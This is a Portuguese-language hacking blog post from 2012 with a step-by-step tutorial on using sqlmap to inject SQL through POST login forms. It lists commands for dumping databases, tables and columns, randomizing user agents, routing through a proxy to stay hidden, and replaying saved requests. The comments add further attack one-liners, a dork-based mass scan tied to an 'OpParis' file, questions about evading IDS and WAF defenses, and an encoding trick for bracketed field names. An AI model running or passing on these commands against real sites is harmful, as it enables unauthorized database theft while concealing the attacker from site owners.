Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sexta-feira, 21 de dezembro de 2012

COMANDOS - SQLMAP Injetando via POST.

sqlmap de uma forma diferente

COMANDOS   -   SQLMAP Injetando via POST.


COMANDOS   -   SQLMAP Injetando via POST.

sqlmap.py --url *************** --current-db
sqlmap.py --url *************** -D 'databasedosite' --tables
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump


ANALISANDO DADOS PARA O ATAQUE VIA POST

Vamos ao agora enviar via post.
Exemplo uma tela de login e senha!, como injetar com sqlmap ??
alvo:http://www.pagina.com.br/login.phpUrl para onde é enviado os posts usuario e senha, como saber qual url. 
Abra o codigo fonte e veja analise o fonte


<form  action="validar/lt.php" method="post"  >
<input type="text" name="login">
<input type="text" name="senha">
</form>

No caso para onde é enviado os posts "campos login e senha".

sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs
#2* e #1* Indica que são campos posts e os mesmo devem ser injetados


DEIXANDO SEU AGENT HTTP RANDÔMICO
Vamos incrementar o comandos no teste.--ramdon-agent ou seja ele vai ramdomizar seu Agent http://en.wikipedia.org/wiki/User_agentEX:
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
A cada requisição ele vai mudar seu user agent:
sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent


SETANDO PROXY
Para ficar não ficar exposto utilizer o parâmetro proxy sempre.--proxy="SEU PROXY:PORTA"
ex:
sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent --proxy="SEU PROXY:PORTA"

MODELO 2 DE INJETAR SQL VIA POST
Agora vamos utilizar a segunda forma de injetar via post.Lendo um arquivo de requisição post via sqlmap, com o comando "-r"Precisamos criar arquivo com o nome fica sua escolha configurado devidamente.Ex:

    POST http://www.pagina.com.br/validar/ls.php HTTP/1.1
    Host: www.pagina.com.br
    Origin: http://www.pagina.com.br/
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.54.16 (KHTML, like Gecko) Version/5.1.4 Safari/534.54.16
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOMD4054CXIAin1BB
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer:  http://www.pagina.com.br/login.php
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=ea4b4f69b0ed5e611b0d1b5ff5c7e9f9;
    Pragma: no-cache
    Connection: keep-alive
    Proxy-Connection: keep-alive
    Content-Length: 468

    ------WebKitFormBoundaryOMD4054CXIAin1BB
    Content-Disposition: form-data; name="login#1*"

    admin
    ------WebKitFormBoundaryMDad4054CXIAin1BB
    Content-Disposition: form-data; name="senha#1*"

    1234

depois de salvar o conteúdo acima no arquivo post.txt,Vamos executalo
../sqlmap.py -r post.txt --dbs --random-agent --proxy="SEU PROXY:PORTA"


"Conhecimento livre & Com responsabilidade"

9 comentários:

  1. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  2. Bem a forma que ele esta mostrando a cima eu fiz doro perfeito bem mais simples voce ter varios modelos para guardar em servidores pela internet.
    Para ajudar também vou colocar um cod.

    ./sqlmap.py -u IP_ALVO --level=5 --regexp --string --text-only --alert --crawl=CRAWLDEPTH --random-agent --dbms=mysql

    Obrigado pelo tutor TKS

    ResponderExcluir
  3. ./sqlmap.py -g --flush-session='OpParis.txt' --dbms=MYSQL TESTADO OK

    ResponderExcluir
  4. ./sqlmap.py -g --flush-session='OpParis.txt' --dbms=MYSQL TESTADO OK

    ResponderExcluir
  5. sqlmap -r /root/Desktop/post.txt --dbs --random-agent

    Quando não especificamos o caminho aonde deve ser feito a leitura, da erro maioria das vezes !

    ResponderExcluir
  6. No decore do ataque sqlmap aparece um ids,ips waf firewall o que fazer sou novo no mundo hacker

    ResponderExcluir
  7. Quando vamos ejetar as vezes o cara coloca o metodo em java ex: form[senha] assim o ataque não vai entrar no dbs, para entrar altere os valores[] para %5b %5d com isso o comando deve ser escrito assim form%5bsenha%5d pronto você vai estar dentro.

    ResponderExcluir

............